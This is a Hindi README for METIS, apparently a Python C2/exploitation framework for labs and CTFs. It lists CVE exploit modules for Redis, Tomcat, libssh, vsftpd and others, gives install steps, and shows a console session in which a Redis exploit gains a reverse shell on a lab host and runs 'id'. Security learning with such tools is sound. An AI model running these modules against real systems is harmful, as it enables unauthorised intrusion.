Metasploit-शैली कंसोल, स्वतः-पंजीकरण करने वाले Exploit और Auxiliary मॉड्यूल, tri-state जाँच, और लैब तथा CTF लक्ष्यों के लिए कई session ट्रांसपोर्ट वाला मॉड्यूलर Python exploitation फ्रेमवर्क।
███╗ ███╗███████╗████████╗██╗███████╗
████╗ ████║██╔════╝╚══██╔══╝██║██╔════╝
██╔████╔██║█████╗ ██║ ██║███████╗
██║╚██╔╝██║██╔══╝ ██║ ██║╚════██║
██║ ╚═╝ ██║███████╗ ██║ ██║███████║
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝╚══════╝
सीखने के लिए बनाया गया एक Python एक्सप्लॉइटेशन फ्रेमवर्क। मॉड्यूलर आर्किटेक्चर, थीम्ड कंसोल, कई सत्र ट्रांसपोर्ट, और CVE मॉड्यूल की बढ़ती लाइब्रेरी।
METIS एक समुदाय-संचालित सुरक्षा अनुसंधान फ्रेमवर्क है। लक्ष्य सुरक्षा शोधकर्ताओं, डेवलपर्स और व्यापक समुदाय द्वारा योगदान किए गए मॉड्यूल का बढ़ता संग्रह बनाना है।
क्या आपके पास कोई उपयोगी स्कैनर, सहायक मॉड्यूल, एक्सप्लॉइट मॉड्यूल, या अन्य सुरक्षा अनुसंधान टूलिंग है जिसे आप साझा करना चाहेंगे? इसे METIS में जोड़ें और एक Pull Request खोलें।
सभी योगदान स्वागत योग्य हैं, बशर्ते वे प्रोजेक्ट की मॉड्यूल संरचना, कोडिंग मानकों और अधिकृत-उपयोग दिशानिर्देशों का पालन करें।
चाहे आप एक नया CVE मॉड्यूल जोड़ रहे हों, किसी मौजूदा मॉड्यूल को बेहतर बना रहे हों, कोई बग ठीक कर रहे हों, या नई फ्रेमवर्क कार्यक्षमता बना रहे हों, आपके योगदान METIS को सभी के लिए बेहतर बनाने में मदद कर सकते हैं।
अपना स्वयं का मॉड्यूल बनाने की जानकारी के लिए नीचे मॉड्यूल लिखना देखें।
METIS एक मॉड्यूलर C2/एक्सप्लॉइटेशन फ्रेमवर्क है जो Python में लिखा गया है। यह एक Metasploit-शैली का इंटरैक्टिव कंसोल चलाता है जहाँ आप मॉड्यूल चुनते हैं, विकल्प सेट करते हैं, जाँच चलाते हैं, और लैब लक्ष्यों के विरुद्ध सत्र प्राप्त करते हैं।
यह इनके लिए डिज़ाइन किया गया है:
यह इनके लिए नहीं डिज़ाइन किया गया है:
modules/ में एक .py फ़ाइल डालें और यह स्वतः पंजीकृत हो जाती हैExploit (सत्र उत्पन्न करता है) और Auxiliary (स्कैनर, एन्यूमरेटर)check() — प्रत्येक मॉड्यूल हमला करने से पहले सत्यापित कर सकता है (VULNERABLE / SAFE / UNKNOWN)file: लक्ष्य स्पेक्स लाइव प्रगति बार के साथKEY=VALUE फ़ाइलों से विकल्प लोड करें| मॉड्यूल | विवरण |
|---|---|
auxiliary/scanner/tcp_connect | थ्रेडेड TCP पोर्ट स्कैनर |
auxiliary/scanner/hikvision_cve_2017_7921 | Hikvision IP कैमरा ऑथ बायपास + उपयोगकर्ता एन्यूमरेशन |
auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 | MikroTik WinBox क्रेडेंशियल लीक |
auxiliary/scanner/redis_cve_2022_0543 | Redis Lua सैंडबॉक्स एस्केप डिटेक्टर |
| मॉड्यूल | सत्र प्रकार |
|---|---|
exploit/unix/ftp/vsftpd_234_backdoor | बाइंड सॉकेट |
exploit/multi/http/ghost_cms_handlebars_rce | रिवर्स सॉकेट |
exploit/multi/http/langflow_rce_cve_2026_9198 | रिवर्स सॉकेट |
exploit/multi/http/budibase_plugin_upload_rce_cve_2026_31816 | रिवर्स सॉकेट |
exploit/multi/http/activemq_jolokia_rce_cve_2026_34197 | रिवर्स सॉकेट |
exploit/multi/http/tomcat_put_rce_cve_2017_12615 | रिवर्स सॉकेट |
exploit/multi/http/joomla_jce_rce_cve_2026_48907 | HTTP वेबशेल |
exploit/linux/http/freepbx_sqli_rce_cve_2025_57819 | विलंबित रिवर्स (cron) |
exploit/linux/redis/redis_cve_2022_0543_rce | रिवर्स सॉकेट |
exploit/linux/ssh/libssh_auth_bypass_cve_2018_10933 | Paramiko चैनल |
exploit/linux/telnet/inetutils_telnetd_bypass_cve_2026_24061 | रॉ टेलनेट सॉकेट |
Python 3.10+ और git आवश्यक है।
git clone https://github.com/K3ysTr0K3R/METIS.git
cd METIS
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt
requirements.txt:
pwntools>=4.11.0
requests>=2.31.0
paramiko>=3.0.0
redis>=5.0.0
cryptography>=42.0.0
rich>=13.7.0
prompt_toolkit>=3.0.43
चलाएँ:
python3 metis.py
metis > show modules
# Module Date Rank Chk Description
-- ------------------------------------------------------------ ---------- --------- --- -----------
1 auxiliary/scanner/hikvision_cve_2017_7921 2017-09-23 normal Yes Hikvision IP Camera Authentication Bypass (CVE-2017-7921)
2 auxiliary/scanner/mikrotik_winbox_creds_cve_2018_14847 2018-08-01 great Yes MikroTik WinBox Credential Leak (CVE-2018-14847)
...
15 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes vsftpd 2.3.4 Backdoor Command Execution
metis > search redis
# Module Date Rank Chk Description
-- ------ ---- ---- --- -----------
1 auxiliary/scanner/redis_cve_2022_0543 2022-02-18 excellent Yes Redis CVE-2022-0543 Scanner
2 exploit/linux/redis/redis_cve_2022_0543_rce 2022-02-18 excellent Yes Redis CVE-2022-0543 Lua Sandbox Escape RCE
metis > use 2
[*] using exploit/linux/redis/redis_cve_2022_0543_rce
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set RHOST 192.168.56.101
[+] RHOST => 192.168.56.101
metis exploit(linux/redis/redis_cve_2022_0543_rce) > set LHOST 192.168.56.1
[+] LHOST => 192.168.56.1
metis exploit(linux/redis/redis_cve_2022_0543_rce) > check
[*] check: probing 192.168.56.101:6379
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[*] check -> vulnerable
metis exploit(linux/redis/redis_cve_2022_0543_rce) > exploit
[*] running check() before exploit (AUTOCHECK=true)
[VULNERABLE] check: 192.168.56.101 vulnerable to CVE-2022-0543
[+] target appears vulnerable — proceeding
[*] listening on 192.168.56.1:4444 for reverse shell
[+] shell from 192.168.56.101:51234
[+] new session: <Session a3f2b1c4 192.168.56.101:51234>
metis exploit(linux/redis/redis_cve_2022_0543_rce) > sessions
a3f2b1c4 192.168.56.101:51234 (alive)
metis exploit(linux/redis/redis_cve_2022_0543_rce) > interact a3f2b1c4
[*] interacting with a3f2b1c4. 'background' returns, '!cmd' runs locally.
a3f2b1c4 $ id
uid=105(redis) gid=108(redis) groups=108(redis)
a3f2b1c4 $ background
metis >